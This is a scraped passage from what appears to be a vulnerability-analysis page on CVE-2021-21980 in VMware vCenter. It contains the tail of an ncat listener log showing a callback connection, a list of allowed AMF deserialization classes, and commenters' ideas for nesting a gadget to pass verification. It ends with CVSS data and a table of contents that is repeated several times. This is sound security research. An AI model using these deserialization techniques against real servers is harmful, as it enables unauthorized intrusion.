Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 172.16.57.237.
Ncat: Connection from 172.16.57.237:41660.
JRMIK

Listing the allowed class patterns for future work

DataService.util.*
\[B
\[Ljava.lang.Object;
antrun.*
cis.ds.*
classes.*
classes.com.vmware.vim.binding.phonehome.*
classes.com.vmware.vim.sso.*
com.vmware.*
flex.messaging.io.ArrayCollection
flex.messaging.io.ArrayList
flex.messaging.io.amf.ASObject
flex.messaging.io.amf.SerializedObject
flex.messaging.messages.AcknowledgeMessage
flex.messaging.messages.AcknowledgeMessageExt
flex.messaging.messages.AsyncMessage
flex.messaging.messages.AsyncMessageExt
flex.messaging.messages.CommandMessage
flex.messaging.messages.CommandMessageExt
flex.messaging.messages.ErrorMessage
flex.messaging.messages.HTTPMessage
flex.messaging.messages.RemotingMessage
flex.messaging.messages.SOAPMessage
java.lang.Boolean
java.lang.Byte
java.lang.Character
java.lang.Double
java.lang.Float
java.lang.Integer
java.lang.Long
java.lang.Object
java.lang.Short
java.lang.String
java.util.ArrayList
java.util.Date
java.util.HashMap
lib.*
metadata.*
mozilla.*
org.apache.commons.net.*
org.apache.commons.net.bsd.*
org.apache.commons.net.chargen.*
org.apache.commons.net.daytime.*
org.apache.commons.net.discard.*
org.apache.commons.net.echo.*
org.apache.commons.net.finger.*
org.apache.commons.net.ftp.*
org.apache.commons.net.ftp.parser.*
org.apache.commons.net.imap.*
org.apache.commons.net.io.*
org.apache.commons.net.nntp.*
org.apache.commons.net.ntp.*
org.apache.commons.net.pop3.*
org.apache.commons.net.smtp.*
org.apache.commons.net.telnet.*
org.apache.commons.net.tftp.*
org.apache.commons.net.time.*
org.apache.commons.net.util.*
org.apache.commons.net.whois.*
org.json.*
org.w3c.dom.Document
schema.*

See More &3 repliesSee Less

pwna5aurus (0) December 07, 2021 6:24am UTC (2 years ago)•Edited 2 years ago

Can’t find the def’n of the SelectedLogsSpec object, but maybe you could nest a Unicast object within an instance of a valid SelectedLogsSpec object? Should pass verification (in theory).

wvu-r7 (437) December 18, 2021 7:26am UTC (2 years ago)

I haven’t forgotten about this. I’ll circle back to it later. Thanks!

wvu-r7 (437) January 14, 2022 6:12am UTC (2 years ago)

https://twitter.com/wvuuuuuuuuuuuuu/status/1468418915994898434

CVSS V3 Severity and Metrics

Data provided by the National Vulnerability Database (NVD)

Base Score:

7.5 High

Impact Score:

3.6

Exploitability Score:

3.9

Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Attack Vector (AV):

Network

Attack Complexity (AC):

Low

Privileges Required (PR):

None

User Interaction (UI):

None

Scope (S):

Unchanged

Confidentiality (C):

High

Integrity (I):

None

Availability (A):

None

Vendors

vmware

Products

cloud foundation 3.0,
vcenter server 6.5,
vcenter server 6.7

References

Canonical

CVE-2021-21980 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21980)

Miscellaneous

https://www.vmware.com/security/advisories/VMSA-2021-0027.html

Rapid7

Unknown

CVE-2021-21980

Unknown

Unknown

None

None

Network

CVE-2021-21980

Description

Add Assessment

Technical Analysis

The Long Tail of CVE-2017-5641

Analyzing the patch and discovering the auth bypass

Testing a `GET` request without the `webClientSessionId` parameter

Testing a `GET` request with the `webClientSessionId` parameter

Testing a `POST` request with the `webClientSessionId` parameter

Analyzing the `DownloadLogController` class and discovering AMF deserialization

Testing AMF deserialization using a bogus string

Testing AMF deserialization using a Base64-encoded string

Testing AMF deserialization using the `UnicastRef` gadget

Testing RCE by forcing it in a debugger, lol

Listing the allowed class patterns for future work

CVSS V3 Severity and Metrics

General Information

Vendors

Products

References

Canonical

Miscellaneous

Additional Info

Technical Analysis

Unknown

CVE-2021-21980

Unknown

Unknown

None

None

Network

CVE-2021-21980

Description

Add Assessment

Technical Analysis

The Long Tail of CVE-2017-5641

Analyzing the patch and discovering the auth bypass

Testing a GET request without the webClientSessionId parameter

Testing a GET request with the webClientSessionId parameter

Testing a POST request with the webClientSessionId parameter

Analyzing the DownloadLogController class and discovering AMF deserialization

Testing AMF deserialization using a bogus string

Testing AMF deserialization using a Base64-encoded string

Testing AMF deserialization using the UnicastRef gadget

Testing RCE by forcing it in a debugger, lol

Listing the allowed class patterns for future work

CVSS V3 Severity and Metrics

General Information

Vendors

Products

References

Canonical

Miscellaneous

Additional Info

Technical Analysis

Quick Cookie Notification

Testing a `GET` request without the `webClientSessionId` parameter

Testing a `GET` request with the `webClientSessionId` parameter

Testing a `POST` request with the `webClientSessionId` parameter

Analyzing the `DownloadLogController` class and discovering AMF deserialization

Testing AMF deserialization using the `UnicastRef` gadget